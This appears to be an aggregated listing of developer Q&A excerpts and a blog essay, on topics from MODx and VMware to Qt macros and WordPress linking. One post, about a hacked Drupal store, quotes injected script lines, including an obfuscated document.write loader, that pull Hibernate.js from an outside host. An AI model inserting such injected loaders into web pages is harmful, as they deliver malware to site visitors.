  • How can I make MODx manager UI work faster?

    - by tambourine
I am currently involve in developing projects on MODx Revolution. I like this system, it fast and great, but what really annoying is manager interface. It works really slow. Every single action require ExtJs panels refreshing. Is there any way to change this behavior or roll back to Evolution interface? Thank you!

  • Has my site been attacked?

    - by fretje
This is about an online store based on Drupal 5. All of a sudden it didn't work anymore. Upon accessing the site, this error came up: Parse error: syntax error, unexpected '<' in /home/public_html/index.php on line 38 Upon further inspection I found the following two lines at the end of said index.php: <script type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></script> <!--7379ba6e55616ea66ac9d812fc0597ba--> After manually removing those 2 lines, the site seems to work fine again. But after more problems (with editing pages) were reported, I found out that actually all the *.js files are "infected". They all contain an extra line at the end: document.write('<s'+'cript type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></scr'+'ipt>'); Has this site been hacked? Upon googling for "blog.nodisposable.com", nothing interesting comes up. That site itself seems legitimate. It's probably hacked itself? Can anybody explain how this could have happened? What I can do to reverse this? And what I can do to avoid this in the future?

  • VMWare Fusion cannot connect to the NAT connection on my Mac

    - by FFish
I have been using VMWare Fusion on my Mac to check out my websites on localhost. Now I can't connect anymore with the NAT connection. There seems to be a problem with my IP address or Mac address? I have no idea what causes this, it was working fine before!? In the XP (SP2) VM, in the taskbar I see the Local Area Connection with the yellow warning icon. The bubble says: "This connection has limited or no connectivity. You might not be aisle to access the Internet or some network resources. For more information, click this message." Doing that opens up the Local Area Connection Status panel. In the Support tab, when I click the repair button I get following message: "Windows could not finish repairing the problem because the following action cannot be completed: Renewing IP address." I tried disabling my firewall and also XAMPP that I use as server on OSX. VMWware version: 3.1 VM: XP SP2 Mac OSX 10.6.3 Any help would be greatly appreciated.

  • It’s nice to be important, but it’s more important to be nice

    - by BuckWoody
I’ve been a little “preachy” lately, telling you that you should let people finish their sentences, and always check a problem out before you tell a user that their issue is “impossible”. Well, I’ll round that out with one more tip today. Keep in mind that all of these things are actions I’ve been guilty of, hopefully in the past. I’m kind of a “work in progress”. And yes, I know these tips are coming from someone who picks on people in presentations, but that is of course done in fun, and (hopefully) with the audience’s knowledge.   (No, this isn’t aimed at any one person or event in particular – I just see it happen a lot)   I’ve seen, unfortunately over and over, someone in authority react badly to someone who is incorrect, or at least perceived to be incorrect. This might manifest itself in a comment, post, question or whatever, but the point is that I’ve seen really intelligent people literally attack someone they view as getting something wrong. Don’t misunderstand me; if someone posts that you should always drop a production database in the middle of the day I think you should certainly speak up and mention that this might be a bad idea!  No, I’m talking about generalizations or even incorrect statements done in good faith. Let me explain with an example.   Suppose someone makes the statement: “If you don’t have enough space on your system, you can just use a DBCC command to shrink the database”. Let’s take two responses to this statement.   Response One: “That’s insane. Everyone knows that shrinking a database is a stupid idea, you’re just going to fragment your indexes all over the place.” Response Two: “That’s an interesting take – in my experience and from what I’ve read here (someurl.com) I think this might not be a universal best practice.”   Of course, both responses let the person making the statement and those reading it know that you don’t agree, and that it’s probably wrong. But the person you responded to and the general audience hearing you (or reading your response) might form two different opinions of you.   The first response says to me “this person really needs to be right, and takes arguments personally. They aren’t thinking of the other person at all, or the folks reading or hearing the exchange. They turned an incorrect technical statement into a personal attack. They haven’t left the other party any room to ‘save face’, and they have potentially turned what could be a positive learning experience for everyone into a negative. Also, they sound more than just a little arrogant.”   The second response says to me “this person has left room for everyone to save face, has presented evidence to the contrary and is thinking about moving the ball forward and getting it right rather than attacking someone for getting it wrong.” It’s the idea of questioning a statement rather than attacking a person.   Perhaps you have a different take. Maybe you think the “direct” approach is best – and maybe that’s worked for you. Something to consider is what you’ve really accomplished while using that first method. Sure, the info you provide is correct, and perhaps someone out there won’t shrink a database because of your response – but perhaps you’ve turned a lot more people off, and now they won’t listen to your other valuable information. You’ll be an expert, but another one of the nameless, arrogant jerks in technology. And I don’t think anyone likes to be thought of that way.   OK, I’ll get down off of the high-horse now. And I’ll keep the title of this entry (said to me by my grandmother when I was a little kid) in mind when I dismount. • Play local video with an HTML/Javascript based Adobe Air application

    - by Matt Wood
I'm trying to add some video playback (that will be used for a tutorial) to my Adobe Air application. I'm not a Flex or Flash developer and my application is HTML/Javascript based, so I'm having trouble with some of the video solutions I've been able to find. Here is one of the examples I've found that is flex based: Playing local files with Air I've looked for a free flash video player that I could just embed. But the only one I've found I was unable to coerce to play files from my Air application directory. I was exited at the prospect of using the HTML5 video tag which I thought Air supported, but that also seems to not work. Can anyone recommend a free flash video player that I can embed? Or a solution that doesn't have to be built completely from flex?

  • JavaScript based diff utility

    - by poke
I'm looking for a diff equivalent written in JavaScript that only returns/prints relevant lines. I don't want both full text displayed next to each other with the differences highlighted, but just want the actual differences (plus some buffer lines to know where the difference is), similar to the output from the linux diff utility. Does anybody know a javascript function that does this? All differences should be recognized (even changed whitespace). Thanks. edit I have seen jsdifflib but in the example it always shows the full source, so unless there is a way to change the output somehow, it doesn't fully meet my requirements.

  • Converting a macro to an inline function

    - by Rob
I am using some Qt code that adds a VERIFY macro that looks something like this: #define VERIFY(cond) \ { \ bool ok = cond; \ Q_ASSERT(ok); \ } The code can then use it whilst being certain the condition is actually evaluated, e.g.: Q_ASSERT(callSomeFunction()); // callSomeFunction not evaluated in release builds! VERIFY(callSomeFunction()); // callSomeFunction is always evaluated Disliking macros, I would instead like to turn this into an inline function: inline VERIFY(bool condition) { Q_ASSERT(condition); } However, in release builds I am worried that the compiler would optimise out all calls to this function (as Q_ASSERT wouldn't actually do anything.) I am I worrying unnecessarily or is this likely depending on the optimisation flags/compiler/etc.? I guess I could change it to: inline VERIFY(bool condition) { condition; Q_ASSERT(condition); } But, again, the compiler may be clever enough to ignore the call. Is this inline alternative safe for both debug and release builds?

  • A way to "improve" write coding in vs2008 experience

    - by stighy
Hi SO gurus. I would like to try to automize some recurrent job when i develop asp.net application. For example, for each <asp:button> I create, I would like to insert the classical code onomouseover="...something" onmouseout=" ..something-again.." Is there a way to automatically add this code "piece" in vs 2008? Some key combination to add "pre-ready" piece of code? Thank you

  • Disallow typing of few of characters e.g.'<', '>' in all input textboxes using jquery

    - by Ismail
How do I achieve this:- When user types character like 'abcd' and then '>'(an invalid character for my application), I want to set the text back to 'abcd'. Better if we can cancel the input itself as we do in winforms application. This should happen when user is typing and not on a click of button. I want this to be applied on all text boxes in my web page. This will be easy if the solution is jQuery based. May be something which will start like this. $("input[type='text']")

  • Parsing a string for dates in PHP

    - by nickf
Given an arbitrary string, for example ("I'm going to play croquet next Friday" or "Gadzooks, is it 17th June already?"), how would you go about extracting the dates from there? If this is looking like a good candidate for the too-hard basket, perhaps you could suggest an alternative. I want to be able to parse Twitter messages for dates. The tweets I'd be looking at would be ones which users are directing at this service, so they could be coached into using an easier format, however I'd like it to be as transparent as possible. Is there a good middle ground you could think of?

  • Wordpress page linking

    - by danixd
I am trying to implement WordPress into quite a large site with a complex page structure and struggling to get normal pages to work (not created through the admin) The pages are created, but when I link to them, nothing happens... The desired url - www.website.com/dir1/dir2/dir3/page.php The actual url- www.website.com/wp-content/themes/themename/dir1/dir2/dir3/page.php The problem with linking to the latter is that it breaks the WordPress functions I don't want to have to give every page a template, then add it through the admin, it is too much work. I only need 2 pages to contain dynamic content. Am I being silly? I am really confused.
